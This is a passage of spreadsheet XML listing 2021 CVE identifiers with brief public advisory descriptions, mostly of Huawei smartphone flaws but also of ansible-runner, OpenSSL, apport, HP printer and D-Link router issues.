    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause kernel crash.</t>
  </si>
  <si>
    <t>CVE-2021-37004</t>
  </si>
  <si>
    <t>CVE-2021-37005</t>
  </si>
  <si>
    <t>CVE-2021-37006</t>
  </si>
  <si>
    <t>There is a Improper Preservation of Permissions vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause the confidentiality of users is affected.</t>
  </si>
  <si>
    <t>CVE-2021-37007</t>
  </si>
  <si>
    <t>There is a Out-of-bounds Read vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause kernel crash.</t>
  </si>
  <si>
    <t>CVE-2021-37008</t>
  </si>
  <si>
    <t>CVE-2021-37009</t>
  </si>
  <si>
    <t>There is a Configuration vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause the confidentiality of users is affected.</t>
  </si>
  <si>
    <t>CVE-2021-3701</t>
  </si>
  <si>
    <t>A flaw was found in ansible-runner where the default temporary files configuration in ansible-2.0.0 are written to world R/W locations. This flaw allows an attacker to pre-create the directory, resulting in reading private information or forcing ansible-runner to write files as the legitimate user in a place they did not expect. The highest threat from this vulnerability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-37010</t>
  </si>
  <si>
    <t>There is a Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause the confidentiality of users is affected.</t>
  </si>
  <si>
    <t>CVE-2021-37011</t>
  </si>
  <si>
    <t>There is a Stack-based Buffer Overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to Out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2021-37012</t>
  </si>
  <si>
    <t>There is a Data Processing Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause kernel crash.</t>
  </si>
  <si>
    <t>CVE-2021-37013</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause the availability of users is affected.</t>
  </si>
  <si>
    <t>CVE-2021-37014</t>
  </si>
  <si>
    <t>There is a Stack-based Buffer Overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to device cannot be used properly.</t>
  </si>
  <si>
    <t>CVE-2021-37015</t>
  </si>
  <si>
    <t>CVE-2021-37016</t>
  </si>
  <si>
    <t>There is a Out-of-bounds Read vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause Information Disclosure or Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-37017</t>
  </si>
  <si>
    <t>CVE-2021-37018</t>
  </si>
  <si>
    <t>CVE-2021-37019</t>
  </si>
  <si>
    <t>CVE-2021-3702</t>
  </si>
  <si>
    <t>A race condition flaw was found in ansible-runner, where an attacker could watch for rapid creation and deletion of a temporary directory, substitute their directory at that name, and then have access to ansible-runner's private_data_dir the next time ansible-runner made use of the private_data_dir. The highest Threat out of this flaw is to integrity and confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37020</t>
  </si>
  <si>
    <t>CVE-2021-37021</t>
  </si>
  <si>
    <t>CVE-2021-37022</t>
  </si>
  <si>
    <t>There is a Heap-based Buffer Overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause root permission which can be escalated.</t>
  </si>
  <si>
    <t>CVE-2021-37023</t>
  </si>
  <si>
    <t>There is a Improper Access Control vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause media files which can be reads and writes in non-distributed directories on any device on the network..</t>
  </si>
  <si>
    <t>CVE-2021-37024</t>
  </si>
  <si>
    <t>CVE-2021-37025</t>
  </si>
  <si>
    <t>CVE-2021-37026</t>
  </si>
  <si>
    <t>CVE-2021-37027</t>
  </si>
  <si>
    <t>There is a DoS vulnerability in smartphones. Successful exploitation of this vulnerability may affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-37028</t>
  </si>
  <si>
    <t>There is a command injection vulnerability in the HG8045Q product. When the command-line interface is enabled, which is disabled by default, attackers with administrator privilege could execute part of commands.</t>
  </si>
  <si>
    <t>CVE-2021-37029</t>
  </si>
  <si>
    <t>There is an Identity verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service availability.</t>
  </si>
  <si>
    <t>CVE-2021-3703</t>
  </si>
  <si>
    <t>It was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196 have been incorrectly mentioned as fixed in RHSA for Serverless 1.16.0 and Serverless client kn 1.16.0. These have been fixed with Serverless 1.17.0.</t>
  </si>
  <si>
    <t>CVE-2021-37030</t>
  </si>
  <si>
    <t>There is an Improper permission vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service availability.</t>
  </si>
  <si>
    <t>CVE-2021-37031</t>
  </si>
  <si>
    <t>There is a Remote DoS vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability will cause the app to exit unexpectedly.</t>
  </si>
  <si>
    <t>CVE-2021-37032</t>
  </si>
  <si>
    <t>There is a Bypass vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause Digital Balance to fail to work.</t>
  </si>
  <si>
    <t>CVE-2021-37033</t>
  </si>
  <si>
    <t>There is an Injection attack vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service availability.</t>
  </si>
  <si>
    <t>CVE-2021-37034</t>
  </si>
  <si>
    <t>There is an Unstandardized field names in Huawei Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37035</t>
  </si>
  <si>
    <t>CVE-2021-37036</t>
  </si>
  <si>
    <t>There is an information leakage vulnerability in FusionCompute 6.5.1, eCNS280_TD V100R005C00 and V100R005C10. Due to the improperly storage of specific information in the log file, the attacker can obtain the information when a user logs in to the device. Successful exploit may cause the information leak.</t>
  </si>
  <si>
    <t>CVE-2021-37037</t>
  </si>
  <si>
    <t>There is an Invalid address access vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause the device to restart.</t>
  </si>
  <si>
    <t>CVE-2021-37038</t>
  </si>
  <si>
    <t>There is an Improper access control vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37039</t>
  </si>
  <si>
    <t>There is an Input verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause Bluetooth DoS.</t>
  </si>
  <si>
    <t>CVE-2021-3704</t>
  </si>
  <si>
    <t>Potential security vulnerabilities have been discovered on a certain HP LaserJet Pro printer that may allow a Denial of Service on the device.</t>
  </si>
  <si>
    <t>CVE-2021-37040</t>
  </si>
  <si>
    <t>There is a Parameter injection vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause privilege escalation of files after CIFS share mounting.</t>
  </si>
  <si>
    <t>CVE-2021-37041</t>
  </si>
  <si>
    <t>There is an Improper verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2021-37042</t>
  </si>
  <si>
    <t>CVE-2021-37043</t>
  </si>
  <si>
    <t>There is a Stack-based Buffer Overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to malicious application processes occupy system resources.</t>
  </si>
  <si>
    <t>CVE-2021-37044</t>
  </si>
  <si>
    <t>There is a Permission control vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service availability.</t>
  </si>
  <si>
    <t>CVE-2021-37045</t>
  </si>
  <si>
    <t>There is an UAF vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause the device to restart unexpectedly and the kernel-mode code to be executed.</t>
  </si>
  <si>
    <t>CVE-2021-37046</t>
  </si>
  <si>
    <t>There is a Memory leak vulnerability with the codec detection module in Huawei Smartphone.Successful exploitation of this vulnerability may cause the device to restart due to memory exhaustion.</t>
  </si>
  <si>
    <t>CVE-2021-37047</t>
  </si>
  <si>
    <t>There is an Input verification vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause some services to restart.</t>
  </si>
  <si>
    <t>CVE-2021-37048</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to fake visitors to control PC,play a video,etc.</t>
  </si>
  <si>
    <t>CVE-2021-37049</t>
  </si>
  <si>
    <t>There is a Heap-based buffer overflow vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may rewrite the memory of adjacent objects.</t>
  </si>
  <si>
    <t>CVE-2021-3705</t>
  </si>
  <si>
    <t>Potential security vulnerabilities have been discovered on a certain HP LaserJet Pro printer that may allow an unauthorized user to reconfigure, reset the device.</t>
  </si>
  <si>
    <t>CVE-2021-37050</t>
  </si>
  <si>
    <t>There is a Missing sensitive data encryption vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37051</t>
  </si>
  <si>
    <t>There is an Out-of-bounds read vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause out-of-bounds memory access.</t>
  </si>
  <si>
    <t>CVE-2021-37052</t>
  </si>
  <si>
    <t>There is an Exception log vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause address information leakage.</t>
  </si>
  <si>
    <t>CVE-2021-37053</t>
  </si>
  <si>
    <t>There is a Service logic vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may cause WLAN DoS.</t>
  </si>
  <si>
    <t>CVE-2021-37054</t>
  </si>
  <si>
    <t>There is an Identity spoofing and authentication bypass vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37055</t>
  </si>
  <si>
    <t>There is a Logic bypass vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to obtain certain device information.</t>
  </si>
  <si>
    <t>CVE-2021-37056</t>
  </si>
  <si>
    <t>There is an Improper permission control vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to obtain certain device information.</t>
  </si>
  <si>
    <t>CVE-2021-37057</t>
  </si>
  <si>
    <t>There is a Improper Validation of Array Index vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to restart the phone.</t>
  </si>
  <si>
    <t>CVE-2021-37058</t>
  </si>
  <si>
    <t>There is a Permissions,Privileges,and Access Controls vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to the user's nickname is maliciously tampered with.</t>
  </si>
  <si>
    <t>CVE-2021-37059</t>
  </si>
  <si>
    <t>There is a Weaknesses Introduced During Design</t>
  </si>
  <si>
    <t>CVE-2021-3706</t>
  </si>
  <si>
    <t>adminlte is vulnerable to Sensitive Cookie Without 'HttpOnly' Flag</t>
  </si>
  <si>
    <t>CVE-2021-37060</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to SAMGR Heap Address Leakage.</t>
  </si>
  <si>
    <t>CVE-2021-37061</t>
  </si>
  <si>
    <t>There is a Uncontrolled Resource Consumption vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to Screen projection application denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-37062</t>
  </si>
  <si>
    <t>There is a Improper Validation of Array Index vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to memory overflow and information leakage.</t>
  </si>
  <si>
    <t>CVE-2021-37063</t>
  </si>
  <si>
    <t>There is a Cryptographic Issues vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to read and delete images of Harmony devices.</t>
  </si>
  <si>
    <t>CVE-2021-37064</t>
  </si>
  <si>
    <t>There is a Improper Limitation of a Pathname to a Restricted Directory vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to arbitrary file created.</t>
  </si>
  <si>
    <t>CVE-2021-37065</t>
  </si>
  <si>
    <t>There is a Integer Overflow or Wraparound vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to Confidentiality or Availability impacted.</t>
  </si>
  <si>
    <t>CVE-2021-37066</t>
  </si>
  <si>
    <t>There is a Out-of-bounds Read vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to process crash.</t>
  </si>
  <si>
    <t>CVE-2021-37067</t>
  </si>
  <si>
    <t>There is a Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to Confidentiality impacted.</t>
  </si>
  <si>
    <t>CVE-2021-37068</t>
  </si>
  <si>
    <t>There is a Resource Management Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to denial of Service Attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37069</t>
  </si>
  <si>
    <t>There is a Race Condition vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to availability affected.</t>
  </si>
  <si>
    <t>CVE-2021-3707</t>
  </si>
  <si>
    <t>D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3708, to execute any OS commands on the vulnerable device.</t>
  </si>
  <si>
    <t>CVE-2021-37070</t>
  </si>
  <si>
    <t>CVE-2021-37071</t>
  </si>
  <si>
    <t>There is a Business Logic Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to persistent dos.</t>
  </si>
  <si>
    <t>CVE-2021-37072</t>
  </si>
  <si>
    <t>There is a Incorrect Calculation of Buffer Size vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to memory crash.</t>
  </si>
  <si>
    <t>CVE-2021-37073</t>
  </si>
  <si>
    <t>There is a Race Condition vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to the detection result is tampered with.</t>
  </si>
  <si>
    <t>CVE-2021-37074</t>
  </si>
  <si>
    <t>There is a Race Condition vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to the user root privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-37075</t>
  </si>
  <si>
    <t>There is a Credentials Management Errors vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to confidentiality affected.</t>
  </si>
  <si>
    <t>CVE-2021-37076</t>
  </si>
  <si>
    <t>There is a Out-of-bounds Read vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to availability affected.</t>
  </si>
  <si>
    <t>CVE-2021-37077</t>
  </si>
  <si>
    <t>There is a NULL Pointer Dereference vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to kernel crash.</t>
  </si>
  <si>
    <t>CVE-2021-37078</t>
  </si>
  <si>
    <t>There is a Uncaught Exception vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to remote Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-37079</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to delete arbitrary file by system_app permission.</t>
  </si>
  <si>
    <t>CVE-2021-3708</t>
  </si>
  <si>
    <t>D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to OS command injection. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3707, to execute any OS commands on the vulnerable device.</t>
  </si>
  <si>
    <t>CVE-2021-37080</t>
  </si>
  <si>
    <t>There is a Incomplete Cleanup vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to availability affected.</t>
  </si>
  <si>
    <t>CVE-2021-37081</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to nearby crash.</t>
  </si>
  <si>
    <t>CVE-2021-37082</t>
  </si>
  <si>
    <t>There is a Race Condition vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to motionhub crash.</t>
  </si>
  <si>
    <t>CVE-2021-37083</t>
  </si>
  <si>
    <t>There is a NULL Pointer Dereference vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to Denial of Service Attacks.</t>
  </si>
  <si>
    <t>CVE-2021-37084</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to malicious invoking other functions of the Smart Assistant through text messages.</t>
  </si>
  <si>
    <t>CVE-2021-37085</t>
  </si>
  <si>
    <t>There is a Encoding timing vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-37086</t>
  </si>
  <si>
    <t>There is a Improper Preservation of Permissions vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to attackers which can isolate and read synchronization files of other applications across the UID sandbox.</t>
  </si>
  <si>
    <t>CVE-2021-37087</t>
  </si>
  <si>
    <t>There is a Path Traversal vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to attackers can create arbitrary file.</t>
  </si>
  <si>
    <t>CVE-2021-37088</t>
  </si>
  <si>
    <t>There is a Path Traversal vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to attackers can write any content to any file.</t>
  </si>
  <si>
    <t>CVE-2021-37089</t>
  </si>
  <si>
    <t>There is a Incomplete Cleanup vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to kernel restart.</t>
  </si>
  <si>
    <t>CVE-2021-3709</t>
  </si>
  <si>
    <t>Function check_attachment_for_errors() in file data/general-hooks/ubuntu.py could be tricked into exposing private data via a constructed crash file. This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;</t>
  </si>
  <si>
    <t>CVE-2021-37090</t>
  </si>
  <si>
    <t>CVE-2021-37091</t>
  </si>
  <si>
    <t>There is a Permissions,Privileges,and Access Controls vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to confidentiality affected.</t>
  </si>
  <si>
    <t>CVE-2021-37092</t>
  </si>
  <si>
    <t>CVE-2021-37093</t>
  </si>
  <si>
    <t>There is a Improper Access Control vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to attackers steal short messages.</t>
  </si>
  <si>
    <t>CVE-2021-37094</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to system denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-37095</t>
  </si>
  <si>
    <t>There is a Integer Overflow or Wraparound vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to remote denial of service and potential remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37096</t>
  </si>
  <si>
    <t>There is a Improper Input Validation vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to user privacy disclosed.</t>
  </si>
  <si>
    <t>CVE-2021-37097</t>
  </si>
  <si>
    <t>There is a Code Injection vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to system restart.</t>
  </si>
  <si>
    <t>CVE-2021-37098</t>
  </si>
  <si>
    <t>Hilinksvc service exists a Data Processing Errors vulnerability .Successful exploitation of this vulnerability may cause application crash.</t>
  </si>
  <si>
    <t>CVE-2021-37099</t>
  </si>
  <si>
    <t>There is a Path Traversal vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to delete any file.</t>
  </si>
  <si>
    <t>CVE-2021-3710</t>
  </si>
  <si>
    <t>An information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;</t>
  </si>
  <si>
    <t>CVE-2021-37100</t>
  </si>
  <si>
    <t>There is a Improper Authentication vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may lead to account authentication bypassed.</t>
  </si>
  <si>
    <t>CVE-2021-37101</t>
  </si>
  <si>
    <t>There is an improper authorization vulnerability in AIS-BW50-00 9.0.6.2(H100SP10C00) and 9.0.6.2(H100SP15C00). Due to improper authorization mangement, an attakcer can exploit this vulnerability by physical accessing the device and implant malicious code. Successfully exploit could leads to arbitrary code execution in the target device.</t>
  </si>
  <si>
    <t>CVE-2021-37102</t>
  </si>
  <si>
    <t>There is a command injection vulnerability in CMA service module of FusionCompute product when processing the default certificate file. The software constructs part of a command using external special input from users, but the software does not sufficiently validate the user input. Successful exploit could allow the attacker to inject certain commands to the system. Affected product versions include: FusionCompute 6.0.0, 6.3.0, 6.3.1, 6.5.0, 6.5.1, 8.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-37103</t>
  </si>
  <si>
    <t>There is an improper permission management vulnerability in the Wallet apps. Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37104</t>
  </si>
  <si>
    <t>There is a server-side request forgery vulnerability in HUAWEI P40 versions 10.1.0.118(C00E116R3P3). This vulnerability is due to insufficient validation of parameters while dealing with some messages. A successful exploit could allow the attacker to gain access to certain resource which the attacker are supposed not to do.</t>
  </si>
  <si>
    <t>CVE-2021-37105</t>
  </si>
  <si>
    <t>There is an improper file upload control vulnerability in FusionCompute 6.5.0, 6.5.1 and 8.0.0. Due to the improper verification of file to be uploaded and does not strictly restrict the file access path, attackers may upload malicious files to the device, resulting in the service abnormal.</t>
  </si>
  <si>
    <t>CVE-2021-37106</t>
  </si>
  <si>
    <t>There is a command injection vulnerability in CMA service module of FusionCompute 6.3.0, 6.3.1, 6.5.0 and 8.0.0 when processing the default certificate file. The software constructs part of a command using external special input from users, but the software does not sufficiently validate the user input. Successful exploit could allow the attacker to inject certain commands to the system.</t>
  </si>
  <si>
    <t>CVE-2021-37107</t>
  </si>
  <si>
    <t>There is an improper memory access permission configuration on ACPU.Successful exploitation of this vulnerability may cause out-of-bounds access.</t>
  </si>
  <si>
    <t>CVE-2021-37109</t>
  </si>
  <si>
    <t>There is a security protection bypass vulnerability with the modem.Successful exploitation of this vulnerability may cause memory protection failure.</t>
  </si>
  <si>
    <t>CVE-2021-3711</t>
  </si>
  <si>
    <t>In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).</t>
  </si>
  <si>
    <t>CVE-2021-37110</t>
  </si>
  <si>
    <t>There is a Timing design defects in Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37111</t>
  </si>
  <si>
    <t>There is a Memory leakage vulnerability in Smartphone.Successful exploitation of this vulnerability may cause memory exhaustion.</t>
  </si>
  <si>
    <t>CVE-2021-37112</t>
  </si>
  <si>
    <t>Hisuite module has a External Control of System or Configuration Setting vulnerability.Successful exploitation of this vulnerability may lead to Firmware leak.</t>
  </si>
  <si>
    <t>CVE-2021-37113</t>
  </si>
  <si>
    <t>There is a Privilege escalation vulnerability with the file system component in Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37114</t>
  </si>
  <si>
    <t>There is an Out-of-bounds read vulnerability in Smartphone.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37115</t>
  </si>
  <si>
    <t>There is an unauthorized rewriting vulnerability with the memory access management module on ACPU.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37116</t>
  </si>
  <si>
    <t>PCManager has a Weaknesses Introduced During Design vulnerability .Successful exploitation of this vulnerability may cause that the PIN of the subscriber is changed.</t>
  </si>
  <si>
    <t>CVE-2021-37117</t>
  </si>
  <si>
    <t>There is a Service logic vulnerability in Smartphone.Successful exploitation of this vulnerability may cause WLAN DoS.</t>
  </si>
  <si>
    <t>CVE-2021-37118</t>
  </si>
  <si>
    <t>The HwNearbyMain module has a Improper Handling of Exceptional Conditions vulnerability.Successful exploitation of this vulnerability may lead to message leak.</t>
  </si>
  <si>
    <t>CVE-2021-37119</t>
  </si>
  <si>
    <t>CVE-2021-3712</t>
  </si>
  <si>
    <t>ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).</t>
  </si>
  <si>
    <t>CVE-2021-37120</t>
  </si>
  <si>
    <t>There is a Double free vulnerability in Smartphone.Successful exploitation of this vulnerability may cause a kernel crash or privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-37121</t>
  </si>
  <si>
    <t>There is a Configuration defects in Smartphone.Successful exploitation of this vulnerability may elevate the MEID (IMEI) permission.</t>
  </si>
  <si>
    <t>CVE-2021-37122</t>
  </si>
  <si>
    <t>There is a use-after-free (UAF) vulnerability in Huawei products. An attacker may craft specific packets to exploit this vulnerability. Successful exploitation may cause the service abnormal. Affected product versions include:CloudEngine 12800 V200R005C10SPC800,V200R019C00SPC800;CloudEngine 5800 V200R005C10SPC800,V200R019C00SPC800;CloudEngine 6800 V200R005C10SPC800,V200R005C20SPC800,V200R019C00SPC800;CloudEngine 7800 V200R005C10SPC800,V200R019C00SPC800.</t>
  </si>
  <si>
    <t>CVE-2021-37123</t>
  </si>
  <si>
    <t>There is an improper authentication vulnerability in Hero-CT060 before 1.0.0.200. The vulnerability is due to that when an user wants to do certain operation, the software does not insufficiently validate the user's identity. Successful exploit could allow the attacker to do certain operations which the user are supposed not to do.</t>
  </si>
  <si>
    <t>CVE-2021-37124</t>
  </si>
  <si>
    <t>There is a path traversal vulnerability in Huawei PC product. Because the product does not filter path with special characters,attackers can construct a file path with special characters to exploit this vulnerability. Successful exploitation could allow the attacker to transport a file to certain path.Affected product versions include:PC Smart Full Scene 11.1 versions PCManager 11.1.1.97.</t>
  </si>
  <si>
    <t>CVE-2021-37125</t>
  </si>
  <si>
    <t>Arbitrary file has a Exposure of Sensitive Information to an Unauthorized Actor vulnerability .Successful exploitation of this vulnerability may cause confidentiality is affected.</t>
  </si>
  <si>
    <t>CVE-2021-37126</t>
  </si>
  <si>
    <t>Arbitrary file has a Exposure of Sensitive Information to an Unauthorized Actor vulnerability .Successful exploitation of this vulnerability may cause the directory is traversed.</t>
  </si>
  <si>
    <t>CVE-2021-37127</t>
  </si>
  <si>
    <t>There is a signature management vulnerability in some huawei products. An attacker can forge signature and bypass the signature check. During firmware update process, successful exploit this vulnerability can cause the forged system file overwrite the correct system file. Affected product versions include:iManager NetEco V600R010C00CP2001,V600R010C00CP2002,V600R010C00SPC100,V600R010C00SPC110,V600R010C00SPC120,V600R010C00SPC200,V600R010C00SPC210,V600R010C00SPC300;iManager NetEco 6000 V600R009C00SPC100,V600R009C00SPC110,V600R009C00SPC120,V600R009C00SPC190,V600R009C00SPC200,V600R009C00SPC201,V600R009C00SPC202,V600R009C00SPC210.</t>
  </si>
  <si>
    <t>CVE-2021-37128</t>
  </si>
  <si>
    <t>HwPCAssistant has a Path Traversal vulnerability .Successful exploitation of this vulnerability may write any file.</t>
  </si>
  <si>
    <t>CVE-2021-37129</t>
  </si>
  <si>
